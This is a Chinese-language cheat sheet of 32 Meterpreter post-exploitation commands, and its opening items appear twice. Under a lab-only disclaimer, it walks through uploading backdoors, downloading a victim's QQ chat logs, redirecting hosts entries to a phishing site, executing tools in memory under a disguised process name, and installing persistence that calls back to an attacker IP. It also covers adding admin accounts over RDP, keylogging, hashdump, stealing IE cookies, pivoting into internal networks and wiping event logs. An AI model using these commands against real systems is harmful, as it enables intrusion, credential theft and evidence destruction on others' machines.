meterpreter会话渗透利用常用命令归纳小结

meterpreter会话渗透利用常用的32个命令归纳小结仅作渗透测试技术实验之用，请勿针对任何未授权网络和设备。1、background命令返回，把meterpreter后台挂起2、session命令session命令可以查看已经成功获取的会话可以使用session-i连接到指定序号的meterpreter会话已继续利用3、shell命令获取目标主机的远程命令行shell如果出错，考虑是目标主机限制了cmd.exe的访问权，可以使用migrate注入到管理员用户进程中再尝试4、cat命令查看目标主机上的文档内容例如：catC:\\boot.ini查看目标主机启动引导信息5、getwd命令获取系统工作的当前目录6、upload命令仅作渗透测试技术实验之用，请勿针对任何未授权网络和设备。1、background命令返回，把meterpreter后台挂起2、session命令session命令可以查看已经成功获取的会话可以使用session-i连接到指定序号的meterpreter会话已继续利用3、shell命令获取目标主机的远程命令行shell如果出错，考虑是目标主机限制了cmd.exe的访问权，可以使用migrate注入到管理员用户进程中再尝试4、cat命令查看目标主机上的文档内容例如：catC:\\boot.ini查看目标主机启动引导信息5、getwd命令获取系统工作的当前目录6、upload命令上传文件到目标主机，例如把后门程序setup.exe传到目标主机system32目录下uploadsetup.exeC:\\windows\\system32\7、download命令把目标主机上的文件下载到我们的攻击主机上例如：把目标主机C盘根目录下的boot.ini文件下载到攻击主机的/root/目录下downloadC:\\boot.ini/root/downloadC:\\ProgramFiles\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db/root/把目标主机上的QQ聊天记录下载到攻击主机的root目录下（仅实验用途，是否要考虑变更你QQ程序的安装路径了呢）8、edit命令调用vi编辑器，对目标主机上的文件修改例如修改目标主机上的hosts文件，使得目标主机访问baidu时去到准备好的钓鱼网站（仅限实验用途）在目标主机上ping，出来的目标IP就是我们修改的192.168.1.1了9、search命令在目标主机文件系统上查找搜索文件例如：search-dc:\\-f*.doc在目标主机C盘下搜索doc文档10、ipconfig命令这个不多说，查看目标主机上的网络参数11、portfwd命令端口转发例如目标主机上开启了3389，但是只允许特定IP访问，攻击主机无法连接，可以使用portfwd命令把目标主机的3389端口转发到其他端口打开例如：portfwdadd-l1122-p3389-r192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口这是只需要连接目标的1122端口就可以打开远程桌面了rdesktop-uadministrator-p123456192.168.250.176:112212、route命令这个也不多说，显示目标主机上的主机路由表13、getuid查看meterpreter注入到目标主机的进程所属用户14、sysinfo查看目标主机系统信息15、ps命令查看目标主机上运行的进程信息，结合migrate使用16、migrate将meterpreter会话移植到另一个进程例如反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的，那么对方一旦关闭掉该word文档，我们获取到的meterpreter会话就会随之关闭，所以把会话进程注入到explorer.exe是一个好方法可以先用ps命令看一下目标主机的explorer.exe进程的pid是1668然后我们用migrate1668把meterpreter会话注入进去17、execute命令在目标主机上运行某个程序例如我们目前注入进程到explorer.exe后，运行用户为超级管理员administrator我们运行一下目标主机上的记事本程序execute-fnotepad.exe目标主机上立马弹出来一个记事本程序，如下图：这样太明显，如果希望隐藏后台执行，加参数-Hexecute-H-fnotepad.exe此时目标主机桌面没反应，但我们在meterpreter会话上使用ps命令看到了再看一个，我们运行目标主机上的cmd.exe程序，并以隐藏的方式直接交互到我们的meterpreter会话上命令：execute-H-i-fcmd.exe这达到的效果就跟使用shell命令一样了再来一个，在目标主机内存中直接执行我们攻击主机上的攻击程序，比如wce.exe，又比如木马等，这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。execute-H-m-dnotepad.exe-fwce.exe-a-owce.txt-d在目标主机执行时显示的进程名称（用以伪装）-m直接从内存中执行-owce.txt是wce.exe的运行参数18、getpid获取meterpreter会话在目标主机上注入进程的进程号19、shutdown命令关闭目标主机20、后渗透模块post/windows/gather/forensics/enum_drives调用在获取meterpreter会话session后，调用post/windows/gather/forensics/enum_drives，可获取目标主机存储器信息：命令，在msfconsole下：usepost/windows/gather/forensics/enum_drivessetSESSION1exploit效果如图：或直接在meterpreter会话中以命令runpost/windows/gather/forensics/enum_drives调用21、调用post/windows/gather/checkvm后渗透模块，确定目标主机是否是一台虚拟机命令：runpost/windows/gather/checkvm效果如下图：22、persistence后渗透模块向目标主机植入后门程序命令：runpersistence-X-i5-p4444-r172.17.11.18-X在目标主机上开机自启动-i不断尝试反向连接的时间间隔效果如下图：执行过程：创建攻击载荷-攻击载荷植入到目标主机c:\windows\temp目录下，是一个.vbs的脚本-写目标主机注册表键值实现开机自动运行。下图，在攻击主机上监听4444端口，等待反弹会话成功下图，看目标主机注册表Run键值果然被写入了一个pDTizIlNK的键值，执行后门vbs脚本23、调用metsvc后渗透攻击模块命令：runmetsvc效果如下图：执行过程：在目标主机上创建一个监听31337端口的服务-在目标主机c:\windows\temp\下创建一个存放后门服务有关文件程序的目录，并上传metsrv.x86.dll、metsvc-server.exe、metsvc.exe三个文件到该目录下-开启服务成功后：在目标主机上看到31337号端口已开，且服务多了一个meterpreter(如下图)24、调用getgui后渗透攻击模块作用：开启目标主机远程桌面，并可添加管理员组账号命令：rungetgui-e开启目标主机远程桌面如下图：开启目标主机的远程桌面服务后，可以添加账号以便利用命令：rungetgui-uexample_username-pexample_password如下图：执行成功，可以使用kali的rdesktop命令使用远程桌面连接目标主机rdesktop-ukali-pmeterpreter192.168.250.176:338925、提权命令getsystem使用getsystem提升当前进城执行账户微system用户，拿到系统最高权限命令：getsystem26、键盘记录器功能keyscan命令：keyscan_start开启记录目标主机的键盘输入keyscan_dump输出截获到的目标键盘输入字符信息keyscan_stop停止键盘记录效果如下图：箭头所指为截获到目标主机的键盘输入字符27、系统账号密码获取命令：hashdump在获得system权限的情况下，使用hashdump命令可以到处目标主机的SAM文件，获取目标主机的账号密码hash信息，剩下的可以用爆破软件算出明文密码效果如图：28、调用post/windows/gather/enum_applications模块获取目标主机上的软件安装信息命令：runpost/windows/gather/enum_applications效果如图：29、调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息命令：runpost/windows/gather/dumplinks效果如下图：30、调用post/windows/gather/enum_ie后渗透模块，读取目标主机IE浏览器cookies等缓存信息，嗅探目标主机登录过的各类账号密码命令：runpost/windows/gather/enum_ie效果如下图：获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf5/loot/目录下。31、route命令使用route命令可以借助meterpreter会话进一步msf渗透内网，我们已经拿下并产生meterpreter反弹会话的主机可能出于内网之中，外有一层NAT，我们无法直接向其内网中其他主机发起攻击，则可以借助已产生的meterpreter会话作为路由跳板，攻击内网其它主机。可以先使用runget_local_subnets命令查看已拿下的目标主机的内网IP段情况命令：runget_local_subnets如下图：其内网尚有192.168.249.0/24网段，我们无法直接访问下面做一条路由，下一跳为当前拿下主机的sessionid（目前为5），即所有对249网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递。命令：routeadd192.168.249.0255.255.255.05再使用routeprint查看一下路由表，效果如下图：最后我们就可以通过这条路由，以当前拿下的主机meterpreter作为路由跳板攻击249网段中另一台有ms08-067漏洞的主机，获得反弹会话成功顺利拿下了另一台内网主机192.168.249.1，如下图：32、clearev命令入侵痕迹擦除在渗透利用过程中难免留下日志等信息痕迹，使用clearev命令擦除痕迹后再跑。命令：clearev效果如下图：